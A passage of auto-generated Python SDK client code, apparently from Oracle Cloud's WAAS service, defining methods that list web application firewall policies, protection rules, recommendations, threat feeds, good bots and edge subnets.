sort_by_allowed_values = ["id", "compartmentId", "displayName", "modSecurityRuleId", "timeCreated"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
for lifecycle_state_item in kwargs['lifecycle_state']:
if lifecycle_state_item not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
"displayName": self.base_client.generate_collection_format_param(kwargs.get("display_name", missing), 'multi'),
"lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
"timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
"timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CustomProtectionRuleSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[CustomProtectionRuleSummary]")
def list_edge_subnets(self, **kwargs):
"""
Return the list of the tenant's edge node subnets. Use these CIDR blocks to restrict incoming traffic to your origin. These subnets are owned by OCI and forward traffic to customer origins. They are not associated with specific regions or compartments.
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which edge node subnets are sorted in a paginated 'List' call. If unspecified, defaults to `timeModified`.
Allowed values are: "cidr", "region", "timeModified"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.EdgeSubnet`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_edge_subnets.py.html>`__ to see an example of how to use list_edge_subnets API.
"""
resource_path = "/edgeSubnets"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_edge_subnets got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["cidr", "region", "timeModified"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[EdgeSubnet]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[EdgeSubnet]")
def list_good_bots(self, waas_policy_id, **kwargs):
"""
Gets the list of good bots defined in the Web Application Firewall configuration for a WAAS policy.
The list is sorted by `key`, in ascending order.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.GoodBot`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_good_bots.py.html>`__ to see an example of how to use list_good_bots API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/goodBots"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_good_bots got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[GoodBot]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[GoodBot]")
def list_protection_rules(self, waas_policy_id, **kwargs):
"""
Gets the list of available protection rules for a WAAS policy. Use the `GetWafConfig` operation to view a list of currently configured protection rules for the Web Application Firewall, or use the `ListRecommendations` operation to get a list of recommended protection rules for the Web Application Firewall.
The list is sorted by `key`, in ascending order.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param list[str] mod_security_rule_id: (optional)
Filter rules using a list of ModSecurity rule IDs.
:param list[str] action: (optional)
Filter rules using a list of actions.
Allowed values are: "OFF", "DETECT", "BLOCK"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.ProtectionRule`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_protection_rules.py.html>`__ to see an example of how to use list_protection_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/protectionRules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"mod_security_rule_id",
"action"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_protection_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'action' in kwargs:
action_allowed_values = ["OFF", "DETECT", "BLOCK"]
for action_item in kwargs['action']:
if action_item not in action_allowed_values:
raise ValueError(
"Invalid value for `action`, must be one of {0}".format(action_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"modSecurityRuleId": self.base_client.generate_collection_format_param(kwargs.get("mod_security_rule_id", missing), 'multi'),
"action": self.base_client.generate_collection_format_param(kwargs.get("action", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[ProtectionRule]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[ProtectionRule]")
def list_recommendations(self, waas_policy_id, **kwargs):
"""
Gets the list of recommended Web Application Firewall protection rules.
Use the `POST /waasPolicies/{waasPolicyId}/actions/acceptWafConfigRecommendations` method to accept recommended Web Application Firewall protection rules. For more information, see `WAF Protection Rules`__.
The list is sorted by `key`, in ascending order.
__ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/wafprotectionrules.htm
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param str recommended_action: (optional)
A filter that matches recommended protection rules based on the selected action. If unspecified, rules with any action type are returned.
Allowed values are: "DETECT", "BLOCK"
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Recommendation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_recommendations.py.html>`__ to see an example of how to use list_recommendations API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/recommendations"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"recommended_action",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_recommendations got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'recommended_action' in kwargs:
recommended_action_allowed_values = ["DETECT", "BLOCK"]
if kwargs['recommended_action'] not in recommended_action_allowed_values:
raise ValueError(
"Invalid value for `recommended_action`, must be one of {0}".format(recommended_action_allowed_values)
)
query_params = {
"recommendedAction": kwargs.get("recommended_action", missing),
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Recommendation]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[Recommendation]")
def list_threat_feeds(self, waas_policy_id, **kwargs):
"""
Gets the list of available web application threat intelligence feeds
and the actions set for each feed. The list is sorted by `key`,
in ascending order.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.ThreatFeed`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_threat_feeds.py.html>`__ to see an example of how to use list_threat_feeds API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/threatFeeds"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_threat_feeds got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[ThreatFeed]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[ThreatFeed]")
def list_waas_policies(self, compartment_id, **kwargs):
"""
Gets a list of WAAS policies.
:param str compartment_id: (required)
The `OCID`__ of the compartment. This number is generated when the compartment is created.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param str sort_by: (optional)
The value by which policies are sorted in a paginated 'List' call. If unspecified, defaults to `timeCreated`.
Allowed values are: "id", "displayName", "timeCreated"
:param str sort_order: (optional)
The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.
Allowed values are: "ASC", "DESC"
:param list[str] id: (optional)
Filter policies using a list of policy OCIDs.
:param list[str] display_name: (optional)
Filter policies using a list of display names.
:param list[str] lifecycle_state: (optional)
Filter policies using a list of lifecycle states.
Allowed values are: "CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"
:param datetime time_created_greater_than_or_equal_to: (optional)
A filter that matches policies created on or after the specified date and time.
:param datetime time_created_less_than: (optional)
A filter that matches policies created before the specified date-time.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WaasPolicySummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waas_policies.py.html>`__ to see an example of how to use list_waas_policies API.
"""
resource_path = "/waasPolicies"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"sort_by",
"sort_order",
"id",
"display_name",
"lifecycle_state",
"time_created_greater_than_or_equal_to",
"time_created_less_than"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waas_policies got unknown kwargs: {!r}".format(extra_kwargs))
if 'sort_by' in kwargs:
sort_by_allowed_values = ["id", "displayName", "timeCreated"]
if kwargs['sort_by'] not in sort_by_allowed_values:
raise ValueError(
"Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
)
if 'sort_order' in kwargs:
sort_order_allowed_values = ["ASC", "DESC"]
if kwargs['sort_order'] not in sort_order_allowed_values:
raise ValueError(
"Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
)
if 'lifecycle_state' in kwargs:
lifecycle_state_allowed_values = ["CREATING", "ACTIVE", "FAILED", "UPDATING", "DELETING", "DELETED"]
for lifecycle_state_item in kwargs['lifecycle_state']:
if lifecycle_state_item not in lifecycle_state_allowed_values:
raise ValueError(
"Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
)
query_params = {
"compartmentId": compartment_id,
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"sortBy": kwargs.get("sort_by", missing),
"sortOrder": kwargs.get("sort_order", missing),
"id": self.base_client.generate_collection_format_param(kwargs.get("id", missing), 'multi'),
"displayName": self.base_client.generate_collection_format_param(kwargs.get("display_name", missing), 'multi'),
"lifecycleState": self.base_client.generate_collection_format_param(kwargs.get("lifecycle_state", missing), 'multi'),
"timeCreatedGreaterThanOrEqualTo": kwargs.get("time_created_greater_than_or_equal_to", missing),
"timeCreatedLessThan": kwargs.get("time_created_less_than", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WaasPolicySummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
query_params=query_params,
header_params=header_params,
response_type="list[WaasPolicySummary]")
def list_waas_policy_custom_protection_rules(self, waas_policy_id, **kwargs):
"""
Gets the list of currently configured custom protection rules for a WAAS policy.
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
:param list[str] mod_security_rule_id: (optional)
Filter rules using a list of ModSecurity rule IDs.
:param list[str] action: (optional)
Filter rules using a list of actions.
Allowed values are: "DETECT", "BLOCK"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:param bool allow_control_chars: (optional)
allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
By default, the response will not allow control characters in strings
:return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WaasPolicyCustomProtectionRuleSummary`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_waas_policy_custom_protection_rules.py.html>`__ to see an example of how to use list_waas_policy_custom_protection_rules API.
"""
resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/customProtectionRules"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"allow_control_chars",
"retry_strategy",
"opc_request_id",
"limit",
"page",
"mod_security_rule_id",
"action"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"list_waas_policy_custom_protection_rules got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"waasPolicyId": waas_policy_id
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'action' in kwargs:
action_allowed_values = ["DETECT", "BLOCK"]
for action_item in kwargs['action']:
if action_item not in action_allowed_values:
raise ValueError(
"Invalid value for `action`, must be one of {0}".format(action_allowed_values)
)
query_params = {
"limit": kwargs.get("limit", missing),
"page": kwargs.get("page", missing),
"modSecurityRuleId": self.base_client.generate_collection_format_param(kwargs.get("mod_security_rule_id", missing), 'multi'),
"action": self.base_client.generate_collection_format_param(kwargs.get("action", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.base_client.get_preferred_retry_strategy(
operation_retry_strategy=kwargs.get('retry_strategy'),
client_retry_strategy=self.retry_strategy
)
if retry_strategy:
if not isinstance(retry_strategy, retry.NoneRetryStrategy):
self.base_client.add_opc_client_retries_header(header_params)
retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WaasPolicyCustomProtectionRuleSummary]")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="list[WaasPolicyCustomProtectionRuleSummary]")
def list_waf_blocked_requests(self, waas_policy_id, **kwargs):
"""
Gets the number of blocked requests by a Web Application Firewall feature in five minute blocks, sorted by `timeObserved` in ascending order (starting from oldest data).
:param str waas_policy_id: (required)
The `OCID`__ of the WAAS policy.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str opc_request_id: (optional)
The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
:param datetime time_observed_greater_than_or_equal_to: (optional)
A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.
:param datetime time_observed_less_than: (optional)
A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.
:param int limit: (optional)
The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.
:param str page: (optional)
The value of the `opc-next-page` response header from the previous paginated call.
